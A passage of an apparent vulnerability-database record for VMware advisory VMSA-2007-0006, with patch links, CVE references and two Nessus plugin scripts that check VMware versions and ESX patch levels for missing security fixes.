GNU\r\n debugger (GDB). Various vulnerabilities were found in GDB. These\r\n vulnerabilities may allow a malicious user to deceive a user into\r\n loading debugging information into GDB, enabling the execution of\r\n arbitrary code with the privileges of the user. (CVE-2006-4146)\r\n\r\n ESX\r\n ---\r\n VMware ESX 3.0.2 Download Patch Bundle ESX-1001730\r\n http://www.vmware.com/support/vi3/doc/esx-1001730-patch.html\r\n md5sum 7f91450c665065c9998a635bbe4c42db\r\n\r\n VMware ESX 3.0.1 Download Patch Bundle ESX-8567382\r\n http://www.vmware.com/support/vi3/doc/esx-8567382-patch.html\r\n md5sum 230a7c7ceec8bd581110ef9303a480fc\r\n\r\n VMware ESX 3.0.0 Download Patch Bundle ESX-1001211\r\n http://www.vmware.com/support/vi3/doc/esx-1001211-patch.html\r\n md5sum 3f30f6a1a28e6ff4c10d5e44864d327e\r\n\r\n NOTE: ESX 3.0.0 is nearing its End-of-life (10/05/2007) users\r\n should upgrade to at least 3.0.1 and preferably the newest\r\n release available\r\n\r\n4. Solution:\r\n\r\nPlease review the Patch notes for your product and version and verify\r\nthe md5sum of your downloaded file.\r\n\r\n ESX 3.0.1, ESX 3.0.0 patches and md5sums are listed in the\r\n above sections\r\n\r\n ESX 2.5.4\r\n http://www.vmware.com/support/esx25/doc/esx-254-200708-patch.html\r\n md5sum 8f29f906e0f3c8605a203f914f36b3d1\r\n\r\n ESX 2.5.3\r\n http://www.vmware.com/support/esx25/doc/esx-253-200708-patch.html\r\n md5sum 32ba19deb7af268ab357710145f8659b\r\n\r\n NOTE: ESX 2.5.3 is nearing its End-of-life (10/05/2007) users\r\n should upgrade to at least 2.5.4 and preferably the newest\r\n release available.\r\n\r\n ESX 2.1.3\r\n http://www.vmware.com/support/esx21/doc/esx-213-200708-patch.html\r\n md5sum 32f9f87a99c5c801dd61492a9d91dfe2\r\n\r\n NOTE: ESX 2.1.3 is nearing its End-of-life (12/15/2007) users\r\n should upgrade to at least 2.5.4 and preferably the newest\r\n release available.\r\n\r\n ESX 2.0.2\r\n http://www.vmware.com/support/esx2/doc/esx-202-200708-patch.html\r\n md5sum f36bb75b51f79e4ba2a2f01a71c3bb08\r\n\r\n NOTE: ESX 2.0.2 is nearning its End-of-life (12/15/2007) users\r\n should upgrade to at least 2.5.4 and preferably the newest\r\n release available.\r\n\r\n Workstation 6.0.1\r\n -----------------\r\n http://www.vmware.com/download/ws/\r\n\r\n Windows release notes:\r\n http://www.vmware.com/support/ws6/doc/releasenotes_ws6.html\r\n Linux release notes:\r\n http://www.vmware.com/support/ws6/doc/releasenotes_ws6.html\r\n\r\n Workstation 5.5.5\r\n -----------------\r\n http://www.vmware.com/download/ws/ws5.html\r\n\r\n Windows release notes:\r\n http://www.vmware.com/support/ws55/doc/releasenotes_ws55.html\r\n Linux release notes:\r\n http://www.vmware.com/support/ws55/doc/releasenotes_ws55.html\r\n\r\n Server 1.0.4\r\n ------------\r\n http://www.vmware.com/download/server/\r\n Release notes:\r\n http://www.vmware.com/support/server/doc/releasenotes_server.html\r\n\r\n ACE 2.0.1 and 1.0.4\r\n -------------------\r\n http://www.vmware.com/download/ace/\r\n\r\n Windows Release notes:\r\n http://www.vmware.com/support/ace2/doc/releasenotes_ace2.html\r\n\r\n Player 2.0.1 and 1.0.5\r\n ----------------------\r\n http://www.vmware.com/download/player/\r\n\r\n Release notes Player 1.x:\r\n http://www.vmware.com/support/player/doc/releasenotes_player.html\r\n Release notes Player 2.0\r\n http://www.vmware.com/support/player2/doc/releasenotes_player2.html\r\n\r\n5. References:\r\n\r\n CVE numbers\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2446\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2447\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0494\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2442\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2443\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2798\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0061\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0062\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0063\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4059\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4155\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4496\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4497\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1856\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1174\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4600\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0813\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1716\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3619\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4146\r\n\r\n\r\n- - -------------------------------------------------------------------\r\n6. Contact:\r\n\r\nE-mail list for product security notifications and announcements:\r\nhttp://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce\r\n\r\nThis Security Advisory is posted to the following lists:\r\n\r\n * security-announce@lists.vmware.com\r\n * bugtraq@securityfocus.com\r\n * full-disclosure@lists.grok.org.uk\r\n\r\nE-mail: security@vmware.com\r\n\r\nhttp://www.vmware.com/security\r\n\r\nVMware Security Response Policy\r\nhttp://www.vmware.com/vmtn/technology/security/security_response.html\r\n\r\nGeneral Support Lifecycle Policy\r\nhttp://www.vmware.com/support/policies/eos.html\r\n\r\nVMware Infrastructure Support Life Cycle Policy\r\nhttp://www.vmware.com/support/policies/eos_vi.html\r\n\r\nCopyright 2007 VMware Inc. All rights reserved.\r\n\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.7 (GNU/Linux)\r\n\r\niD8DBQFG8depS2KysvBH1xkRCLHoAJ9sJyVIqG7nGjbLlCo1d7ogan7SQwCcC6Wj\r\nng+NNXJenc6G4YXR0xce8U4=\r\n=ElrO\r\n-----END PGP SIGNATURE-----", "modified": "2007-09-21T00:00:00", "published": "2007-09-21T00:00:00", "id": "SECURITYVULNS:DOC:18039", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:18039", "title": "VMSA-2007-0006 Critical security updates for all supported versions of VMware ESX Server, VMware Server, VMware Workstation, VMware ACE, and VMware Player", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-01-16T20:07:30", "bulletinFamily": "scanner", "description": "The version of VMware Workstation/Server installed on the remote host\nis affected by multiple vulnerabilities, including a privelege\nelevation vulnerability that allows a guest to take over a host and a\nbuffer overflow vulnerability in the DHCP daemon. \n\nThe buffer overlflow in the DHCP server may allow a remote attacker to\nexecute arbitrary code on the remote host with SYSTEM privileges.", "modified": "2018-11-15T00:00:00", "published": "2007-10-04T00:00:00", "id": "VMWARE_WS_SERVER_MULTIPLE.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=26911", "title": "VMware Workstation < 5.5.5 and Server < 1.0.4 Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(26911);\n script_version(\"1.17\");\n\n script_cve_id(\n \"CVE-2007-0061\",\n \"CVE-2007-0062\",\n \"CVE-2007-0063\",\n \"CVE-2007-4058\",\n \"CVE-2007-4059\",\n \"CVE-2007-4155\",\n \"CVE-2007-4496\",\n \"CVE-2007-4497\",\n \"CVE-2007-4591\",\n \"CVE-2007-5023\"\n );\n script_bugtraq_id(25110,25118,25131,25441,25728,25729,25732);\n\n script_name(english:\"VMware Workstation < 5.5.5 and Server < 1.0.4 Multiple Vulnerabilities\");\n script_summary(english:\"Checks version of VMware Workstation\"); \n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has an application that is affected by\nmultiple issues.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware Workstation/Server installed on the remote host\nis affected by multiple vulnerabilities, including a privelege\nelevation vulnerability that allows a guest to take over a host and a\nbuffer overflow vulnerability in the DHCP daemon. \n\nThe buffer overlflow in the DHCP server may allow a remote attacker to\nexecute arbitrary code on the remote host with SYSTEM privileges.\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/support/ws6/doc/releasenotes_ws6.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/support/server/doc/releasenotes_server.html\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware Workstation 6.0.1/5.5.5 or VMware Server 1.0.4.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(22, 119, 189, 264, 399);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2007/10/04\");\n script_cvs_date(\"Date: 2018/11/15 20:50:29\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"local\");\nscript_set_attribute(attribute:\"cpe\",value:\"cpe:/a:vmware:server\");\nscript_set_attribute(attribute:\"cpe\",value:\"cpe:/a:vmware:vmware_workstation\");\nscript_end_attributes();\n\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"vmware_workstation_detect.nasl\", \"vmware_server_win_detect.nasl\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\nversion = get_kb_item(\"VMware/Workstation/Version\");\nif (version)\n{\n v = split(version, sep:\".\", keep:FALSE);\n\n if ( ( int(v[0]) < 5 ) ||\n ( int(v[0]) == 5 && int(v[1]) < 5 ) ||\n ( int(v[0]) == 5 && int(v[1]) == 5 && int(v[2]) < 5 ) ||\n ( int(v[0]) == 6 && int(v[1]) == 0 && int(v[2]) < 1 ) )\n {\n \tsecurity_hole(get_kb_item(\"SMB/transport\"));\n\texit(0);\n }\n}\n\nversion = get_kb_item(\"VMware/Server/Version\");\nif (version)\n{\n v = split(version, sep:\".\", keep:FALSE);\n\n if ( ( int(v[0]) < 1 ) ||\n ( int(v[0]) == 1 && int(v[1]) == 0 && int(v[2]) < 4 ) )\n security_hole(get_kb_item(\"SMB/transport\"));\n}\n\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-16T20:09:36", "bulletinFamily": "scanner", "description": "Problems addressed by these patches :\n\nI Arbitrary code execution and denial of service vulnerabilities\n\n This release fixes a security vulnerability that could allow a\n guest operating system user with administrative privileges to cause\n memory corruption in a host process, and thus potentially execute\n arbitrary code on the host. (CVE-2007-4496)\n\n This release fixes a denial of service vulnerability that could\n allow a guest operating system to cause a host process to become\n unresponsive or exit unexpectedly. (CVE-2007-4497)\n\n Thanks to Rafal Wojtczvk of McAfee for identifying and reporting\n these issues.\n\nII Hosted products DHCP security vulnerabilities addressed\n\n This release fixes several vulnerabilities in the DHCP server\n that could enable a specially crafted packets to gain system-level\n privileges. (CVE-2007-0061, CVE-2007-0062, CVE-2007-0063)\n\n Thanks to Neel Mehta and Ryan Smith of the IBM Internet Security\n Systems X-Force for discovering and researching these\n vulnerabilities.\n\nIII Windows based hosted product vulnerability in\n IntraProcessLogging.dll and vielib.dll.\n\n This release fixes a security vulnerability that could allow a\n malicious remote user to exploit the library file\n IntraProcessLogging.dll to overwrite files in a system.\n (CVE-2007-4059)\n\n This release fixes a security vulnerability that could allow a\n malicious remote user to exploit the library file vielib.dll to\n overwrite files in a system. (CVE-2007-4155)\n\n Thanks to the Goodfellas Security Research Team for discovering and\n researching these vulnerabilities.\n\nIV Escalation of privileges on Windows hosted systems\n\n This release fixes a security vulnerability in which Workstation\n was starting registered Windows services in an insecure manner.\n This vulnerability could allow a malicious user to escalate user\n privileges.\n\n Thanks to Foundstone for discovering this vulnerability.\n\nV Potential denial of service using VMware Player\n\n This release fixes a problem that prevented VMware Player from\n launching. This problem was accompanied by the error message VMware\n Player unrecoverable error: (player) Exception 0xc0000005 (access\n violation) has occurred.\n\nVI ESX Service Console updates\n\na. Service console package Samba, has been updated to address the\n following issues :\n\n Various bugs were found in NDR parsing, used to decode MS-RPC\n requests in Samba. A remote attacker could have sent carefully\n crafted requests causing a heap overflow, which may have led to the\n ability to execute arbitrary code on the server. (CVE-2007-2446)\n\n Unescaped user input parameters were being passed as arguments to\n /bin/sh. A remote, authenticated, user could have triggered this\n flaw and executed arbitrary code on the server. Additionally, this\n flaw could be triggered by a remote unauthenticated user if Samba\n was configured to use the non-default username map script option.\n (CVE-2007-2447)\n\n Thanks to the Samba developers, TippingPoint, and iDefense for\n identifying and reporting these issues.\n\n Note: These issues only affect the service console network, and are\n not remote vulnerabilities for ESX Server hosts that have been set\n up with the security best practices provided by VMware.\n http://www.vmware.com/resources/techresources/726\n\nb. Updated bind package for the service console fixes a flaw with the\n way ISC BIND processed certain DNS query responses.\n\n ISC BIND (Berkeley Internet Name Domain) is an implementation of\n the DNS (Domain Name System) protocols. Under some circumstances, a\n malicious remote user could launch a Denial-of-Service attack on\n ESX Server hosts that had enabled DNSSEC validation.\n (CVE-2007-0494)\n\n Note: These issues only affect the service console network, and are\n not remote vulnerabilities for ESX Server hosts that have been set\n up with the security best practices provided by VMware.\n http://www.vmware.com/resources/techresources/726\n\nc. This patch provides updated service console package krb5 update.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n assigned the names CVE-2007-2442, CVE-2007-2443, and CVE-2007-2798\n to these security issues.\n\n Thanks to Wei Wang of McAfee Avert Labs discovered these\n vulnerabilities.\n\n Note: The VMware service console does not provide the kadmind\n binary, and is not affected by these issues, but a update has been\n provided for completeness.\n\nd. Service console update for vixie-cron\n\n This patch provides an updated service console package vixie-cron.\n Cron is a standard UNIX daemon that runs specified programs at\n scheduled times.\n\n A denial of service issue was found in the way vixie-cron verified\n crontab file integrity. A local user with the ability to create a\n hardlink to /etc/crontab could potentially prevent vixie-cron from\n executing certain system cron jobs. (CVE-2007-1856)\n\n Thanks to Raphael Marichez for identifying this issue.\n\ne. Service console update for shadow-utils\n\n This patch provides an updated shadow-utils package. A new\n user's mailbox, when created, could have random permissions for a\n short period. This could enable a local malicious user to\n read or modify the mailbox. (CVE-2006-1174)\n\nf. Service console update for OpenLDAP\n\n This patch provides a updated OpenLDAP package. A flaw could\n allow users with selfwrite access to modify the distinguished\n name of any user, instead of being limited to modify only\n their own distinguished name. (CVE-2006-4600)\n\ng. Service console update for PAM\n\n This patch provides an updated PAM package A vulnerability was\n found that could allow console users with access to certain device\n files to cause damage to recordable CD drives. Certain file\n permissions have now been modified to disallow access.\n (CVE-2004-0813)\n\n A flaw was found with console device permissions. It was possible\n for various console devices to retain ownership of the previoius\n console user after logging out, which could result in leakage of\n information to an unauthorized user. (CVE-2007-1716)\n\nh. Service console update for GCC\n\n This patch provides security fixes for the service console GNU\n Compiler Collection (GCC) packages that include C, C++, Java,\n Fortran 77, Objective C, and Ada 95 GNU compilers and related\n support libraries.\n\n A flaw was found in the fastjar utility that could potentially\n allow a malicious user to create a JAR file which, if unpacked\n using fastjar, could write to any file that an authorized user had\n write access to. (CVE-2006-3619)\n\n Thanks to Jürgen Weigert for identifying this issue.\n\ni. Service Console update for GDB\n\n This patch provides a security fix for the service console GNU\n debugger (GDB). Various vulnerabilities were found in GDB. These\n vulnerabilities may allow a malicious user to deceive a user into\n loading debugging information into GDB, enabling the execution of\n arbitrary code with the privileges of the user. (CVE-2006-4146)", "modified": "2018-08-06T00:00:00", "published": "2009-07-27T00:00:00", "id": "VMWARE_VMSA-2007-0006.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=40370", "title": "VMSA-2007-0006 : Critical security updates for all supported versions of VMware ESX Server, VMware Server, VMware Workstation, VMware ACE, and VMware Player", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from VMware Security Advisory 2007-0006. \n# The text itself is copyright (C) VMware Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(40370);\n script_version(\"1.24\");\n script_cvs_date(\"Date: 2018/08/06 14:03:16\");\n\n script_cve_id(\"CVE-2004-0813\", \"CVE-2006-1174\", \"CVE-2006-3619\", \"CVE-2006-4146\", \"CVE-2006-4600\", \"CVE-2007-0061\", \"CVE-2007-0062\", \"CVE-2007-0063\", \"CVE-2007-0494\", \"CVE-2007-1716\", \"CVE-2007-1856\", \"CVE-2007-2442\", \"CVE-2007-2443\", \"CVE-2007-2446\", \"CVE-2007-2447\", \"CVE-2007-2798\", \"CVE-2007-4059\", \"CVE-2007-4155\", \"CVE-2007-4496\", \"CVE-2007-4497\");\n script_bugtraq_id(18111, 19832, 22231, 23520, 23972, 23973, 24195, 24196, 24197, 24198, 24653, 24655, 24657, 25110, 25131, 25729, 25731, 25732);\n script_xref(name:\"VMSA\", value:\"2007-0006\");\n\n script_name(english:\"VMSA-2007-0006 : Critical security updates for all supported versions of VMware ESX Server, VMware Server, VMware Workstation, VMware ACE, and VMware Player\");\n script_summary(english:\"Checks esxupdate output for the patches\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote VMware ESX host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Problems addressed by these patches :\n\nI Arbitrary code execution and denial of service vulnerabilities\n\n This release fixes a security vulnerability that could allow a\n guest operating system user with administrative privileges to cause\n memory corruption in a host process, and thus potentially execute\n arbitrary code on the host. (CVE-2007-4496)\n\n This release fixes a denial of service vulnerability that could\n allow a guest operating system to cause a host process to become\n unresponsive or exit unexpectedly. (CVE-2007-4497)\n\n Thanks to Rafal Wojtczvk of McAfee for identifying and reporting\n these issues.\n\nII Hosted products DHCP security vulnerabilities addressed\n\n This release fixes several vulnerabilities in the DHCP server\n that could enable a specially crafted packets to gain system-level\n privileges. (CVE-2007-0061, CVE-2007-0062, CVE-2007-0063)\n\n Thanks to Neel Mehta and Ryan Smith of the IBM Internet Security\n Systems X-Force for discovering and researching these\n vulnerabilities.\n\nIII Windows based hosted product vulnerability in\n IntraProcessLogging.dll and vielib.dll.\n\n This release fixes a security vulnerability that could allow a\n malicious remote user to exploit the library file\n IntraProcessLogging.dll to overwrite files in a system.\n (CVE-2007-4059)\n\n This release fixes a security vulnerability that could allow a\n malicious remote user to exploit the library file vielib.dll to\n overwrite files in a system. (CVE-2007-4155)\n\n Thanks to the Goodfellas Security Research Team for discovering and\n researching these vulnerabilities.\n\nIV Escalation of privileges on Windows hosted systems\n\n This release fixes a security vulnerability in which Workstation\n was starting registered Windows services in an insecure manner.\n This vulnerability could allow a malicious user to escalate user\n privileges.\n\n Thanks to Foundstone for discovering this vulnerability.\n\nV Potential denial of service using VMware Player\n\n This release fixes a problem that prevented VMware Player from\n launching. This problem was accompanied by the error message VMware\n Player unrecoverable error: (player) Exception 0xc0000005 (access\n violation) has occurred.\n\nVI ESX Service Console updates\n\na. Service console package Samba, has been updated to address the\n following issues :\n\n Various bugs were found in NDR parsing, used to decode MS-RPC\n requests in Samba. A remote attacker could have sent carefully\n crafted requests causing a heap overflow, which may have led to the\n ability to execute arbitrary code on the server. (CVE-2007-2446)\n\n Unescaped user input parameters were being passed as arguments to\n /bin/sh. A remote, authenticated, user could have triggered this\n flaw and executed arbitrary code on the server. Additionally, this\n flaw could be triggered by a remote unauthenticated user if Samba\n was configured to use the non-default username map script option.\n (CVE-2007-2447)\n\n Thanks to the Samba developers, TippingPoint, and iDefense for\n identifying and reporting these issues.\n\n Note: These issues only affect the service console network, and are\n not remote vulnerabilities for ESX Server hosts that have been set\n up with the security best practices provided by VMware.\n http://www.vmware.com/resources/techresources/726\n\nb. Updated bind package for the service console fixes a flaw with the\n way ISC BIND processed certain DNS query responses.\n\n ISC BIND (Berkeley Internet Name Domain) is an implementation of\n the DNS (Domain Name System) protocols. Under some circumstances, a\n malicious remote user could launch a Denial-of-Service attack on\n ESX Server hosts that had enabled DNSSEC validation.\n (CVE-2007-0494)\n\n Note: These issues only affect the service console network, and are\n not remote vulnerabilities for ESX Server hosts that have been set\n up with the security best practices provided by VMware.\n http://www.vmware.com/resources/techresources/726\n\nc. This patch provides updated service console package krb5 update.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n assigned the names CVE-2007-2442, CVE-2007-2443, and CVE-2007-2798\n to these security issues.\n\n Thanks to Wei Wang of McAfee Avert Labs discovered these\n vulnerabilities.\n\n Note: The VMware service console does not provide the kadmind\n binary, and is not affected by these issues, but a update has been\n provided for completeness.\n\nd. Service console update for vixie-cron\n\n This patch provides an updated service console package vixie-cron.\n Cron is a standard UNIX daemon that runs specified programs at\n scheduled times.\n\n A denial of service issue was found in the way vixie-cron verified\n crontab file integrity. A local user with the ability to create a\n hardlink to /etc/crontab could potentially prevent vixie-cron from\n executing certain system cron jobs. (CVE-2007-1856)\n\n Thanks to Raphael Marichez for identifying this issue.\n\ne. Service console update for shadow-utils\n\n This patch provides an updated shadow-utils package. A new\n user's mailbox, when created, could have random permissions for a\n short period. This could enable a local malicious user to\n read or modify the mailbox. (CVE-2006-1174)\n\nf. Service console update for OpenLDAP\n\n This patch provides a updated OpenLDAP package. A flaw could\n allow users with selfwrite access to modify the distinguished\n name of any user, instead of being limited to modify only\n their own distinguished name. (CVE-2006-4600)\n\ng. Service console update for PAM\n\n This patch provides an updated PAM package A vulnerability was\n found that could allow console users with access to certain device\n files to cause damage to recordable CD drives. Certain file\n permissions have now been modified to disallow access.\n (CVE-2004-0813)\n\n A flaw was found with console device permissions. It was possible\n for various console devices to retain ownership of the previoius\n console user after logging out, which could result in leakage of\n information to an unauthorized user. (CVE-2007-1716)\n\nh. Service console update for GCC\n\n This patch provides security fixes for the service console GNU\n Compiler Collection (GCC) packages that include C, C++, Java,\n Fortran 77, Objective C, and Ada 95 GNU compilers and related\n support libraries.\n\n A flaw was found in the fastjar utility that could potentially\n allow a malicious user to create a JAR file which, if unpacked\n using fastjar, could write to any file that an authorized user had\n write access to. (CVE-2006-3619)\n\n Thanks to Jürgen Weigert for identifying this issue.\n\ni. Service Console update for GDB\n\n This patch provides a security fix for the service console GNU\n debugger (GDB). Various vulnerabilities were found in GDB. These\n vulnerabilities may allow a malicious user to deceive a user into\n loading debugging information into GDB, enabling the execution of\n arbitrary code with the privileges of the user. (CVE-2006-4146)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://lists.vmware.com/pipermail/security-announce/2007/000001.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply the missing patches.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba \"username map script\" Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(119, 189, 264, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esx:2.0.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esx:2.1.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esx:2.5.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esx:2.5.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esx:3.0.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esx:3.0.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esx:3.0.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/09/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/27\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/07/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n script_family(english:\"VMware ESX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/VMware/release\", \"Host/VMware/version\");\n script_require_ports(\"Host/VMware/esxupdate\", \"Host/VMware/esxcli_software_vibs\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"vmware_esx_packages.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/VMware/release\")) audit(AUDIT_OS_NOT, \"VMware ESX / ESXi\");\nif (\n !get_kb_item(\"Host/VMware/esxcli_software_vibs\") &&\n !get_kb_item(\"Host/VMware/esxupdate\")\n) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ninit_esx_check(date:\"2007-09-18\");\nflag = 0;\n\n\nif (esx_check(ver:\"ESX 2.0.2\", patch:\"8\")) flag++;\n\nif (esx_check(ver:\"ESX 2.1.3\", patch:\"8\")) flag++;\n\nif (esx_check(ver:\"ESX 2.5.3\", patch:\"13\")) flag++;\n\nif (esx_check(ver:\"ESX 2.5.4\", patch:\"10\")) flag++;\n\nif (esx_check(ver:\"ESX 3.0.0\", patch:\"ESX-1001204\")) flag++;\nif (esx_check(ver:\"ESX 3.0.0\", patch:\"ESX-1001205\")) flag++;\nif (esx_check(ver:\"ESX 3.0.0\", patch:\"ESX-1001206\")) flag++;\nif (esx_check(ver:\"ESX 3.0.0\", patch:\"ESX-1001207\")) flag++;\nif (esx_check(ver:\"ESX 3.0.0\", patch:\"ESX-1001208\")) flag++;\nif (esx_check(ver:\"ESX 3.0.0\", patch:\"ESX-1001209\")) flag++;\nif (esx_check(ver:\"ESX 3.0.0\", patch:\"ESX-1001210\")) flag++;\nif (esx_check(ver:\"ESX 3.0.0\", patch:\"ESX-1001211\")) flag++;\nif (esx_check(ver:\"ESX 3.0.0\", patch:\"ESX-1001212\")) flag++;\nif (esx_check(ver:\"ESX 3.0.0\", patch:\"ESX-4809553\")) flag++;\n\nif (esx_check(ver:\"ESX 3.0.1\", patch:\"ESX-1001213\")) flag++;\nif (esx_check(ver:\"ESX 3.0.1\", patch:\"ESX-1001214\")) flag++;\nif (esx_check(ver:\"ESX 3.0.1\", patch:\"ESX-1001691\")) flag++;\nif (esx_check(ver:\"ESX 3.0.1\", patch:\"ESX-1001692\")) flag++;\nif (esx_check(ver:\"ESX 3.0.1\", patch:\"ESX-1001693\")) flag++;\nif (esx_check(ver:\"ESX 3.0.1\", patch:\"ESX-1001694\")) flag++;\nif (esx_check(ver:\"ESX 3.0.1\", patch:\"ESX-1001723\")) flag++;\nif (esx_check(ver:\"ESX 3.0.1\", patch:\"ESX-8253547\")) flag++;\nif (esx_check(ver:\"ESX 3.0.1\", patch:\"ESX-8258730\")) flag++;\nif (esx_check(ver:\"ESX 3.0.1\", patch:\"ESX-8567382\")) flag++;\n\nif (esx_check(ver:\"ESX 3.0.2\", patch:\"ESX-1001725\")) flag++;\nif (esx_check(ver:\"ESX 3.0.2\", patch:\"ESX-1001726\")) flag++;\nif (esx_check(ver:\"ESX 3.0.2\", patch:\"ESX-1001727\")) flag++;\nif (esx_check(ver:\"ESX 3.0.2\", patch:\"ESX-1001728\")) flag++;\nif (esx_check(ver:\"ESX 3.0.2\", patch:\"ESX-1001729\")) flag++;\nif (esx_check(ver:\"ESX 3.0.2\", patch:\"ESX-1001730\")) flag++;\nif (esx_check(ver:\"ESX 3.0.2\", patch:\"ESX-1001731\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:esx_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "vmware": [{"lastseen": "2018-09-02T02:40:43", "bulletinFamily": "unix", "description": " \nProblems addressed by these patches: \n \nI Arbitrary code execution and denial of service vulnerabilities \n \nThis release fixes a security vulnerability that could allow a guest operating system user with administrative privileges to cause memory corruption in a host process, and thus potentially execute arbitrary code on the host. (CVE-2007-4496) \n \nThis release fixes a denial of service vulnerability that could allow a guest operating system to cause a host process to become unresponsive or exit unexpectedly. (CVE-2007-4497) \n \nThanks to Rafal Wojtczvk of McAfee for identifying and reporting \nthese issues. \n \nESX \n\\--- \nVMware ESX 3.0.1 Download Patch Bundle 